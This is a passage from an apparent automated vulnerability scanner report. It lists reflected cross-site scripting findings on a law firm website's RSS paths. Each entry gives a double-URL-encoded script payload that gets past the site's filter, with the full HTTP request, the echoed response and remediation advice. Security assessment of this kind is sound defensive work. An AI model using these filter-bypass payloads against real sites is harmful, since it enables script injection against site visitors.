The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesb78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesb78b0"><script>alert(1)</script>9778950fc0/Franchise/rss.xml" value="">
...[SNIP]...

4.253. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8 was submitted in the REST URL parameter 3. This input was echoed as d4984"><script>alert(1)</script>61790d4d9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Franchised4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Franchised4984"><script>alert(1)</script>61790d4d9a8/rss.xml" value="">
...[SNIP]...

4.254. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b was submitted in the REST URL parameter 4. This input was echoed as 214b4"><script>alert(1)</script>273c67fee0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Franchise/rss.xml214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Franchise/rss.xml214b4"><script>alert(1)</script>273c67fee0b" value="">
...[SNIP]...

4.255. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2 was submitted in the REST URL parameter 1. This input was echoed as f2dde"><script>alert(1)</script>ed620a3a2e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssf2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2/practices/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssf2dde"><script>alert(1)</script>ed620a3a2e2/practices/Government_Contracts/rss.xml" value="">
...[SNIP]...

4.256. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6 was submitted in the REST URL parameter 2. This input was echoed as ad839"><script>alert(1)</script>b98612c93e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesad839"><script>alert(1)</script>b98612c93e6/Government_Contracts/rss.xml" value="">
...[SNIP]...

4.257. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2 was submitted in the REST URL parameter 3. This input was echoed as a8ea8"><script>alert(1)</script>7c519c08fc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Government_Contractsa8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Government_Contractsa8ea8"><script>alert(1)</script>7c519c08fc2/rss.xml" value="">
...[SNIP]...

4.258. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb was submitted in the REST URL parameter 4. This input was echoed as 9c8b4"><script>alert(1)</script>4f8e8ef06bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Government_Contracts/rss.xml9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Government_Contracts/rss.xml9c8b4"><script>alert(1)</script>4f8e8ef06bb" value="">
...[SNIP]...

4.259. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86 was submitted in the REST URL parameter 1. This input was echoed as 86cb4"><script>alert(1)</script>fd584c5ec86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86/practices/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss86cb4"><script>alert(1)</script>fd584c5ec86/practices/Health_Care/rss.xml" value="">
...[SNIP]...

4.260. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf was submitted in the REST URL parameter 2. This input was echoed as cc67c"><script>alert(1)</script>d7658866ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicescc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicescc67c"><script>alert(1)</script>d7658866ddf/Health_Care/rss.xml" value="">
...[SNIP]...

4.261. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4 was submitted in the REST URL parameter 3. This input was echoed as f87dc"><script>alert(1)</script>ee3d1a37ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Health_Caref87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Health_Caref87dc"><script>alert(1)</script>ee3d1a37ca4/rss.xml" value="">
...[SNIP]...

4.262. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 was submitted in the REST URL parameter 4. This input was echoed as f1cbf"><script>alert(1)</script>efc92306738 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Health_Care/rss.xmlf1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Health_Care/rss.xmlf1cbf"><script>alert(1)</script>efc92306738" value="">
...[SNIP]...

4.263. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532 was submitted in the REST URL parameter 1. This input was echoed as 7953a"><script>alert(1)</script>a4cf2c1a532 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532/practices/Insurance/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss7953a"><script>alert(1)</script>a4cf2c1a532/practices/Insurance/rss.xml" value="">
...[SNIP]...

4.264. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e was submitted in the REST URL parameter 2. This input was echoed as a0999"><script>alert(1)</script>5bd9f5471e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesa0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e/Insurance/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesa0999"><script>alert(1)</script>5bd9f5471e/Insurance/rss.xml" value="">
...[SNIP]...

4.265. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e was submitted in the REST URL parameter 3. This input was echoed as a3861"><script>alert(1)</script>021aa92fc8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Insurancea3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Insurancea3861"><script>alert(1)</script>021aa92fc8e/rss.xml" value="">
...[SNIP]...

4.266. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 was submitted in the REST URL parameter 4. This input was echoed as dc903"><script>alert(1)</script>8c3f9de4a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Insurance/rss.xmldc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


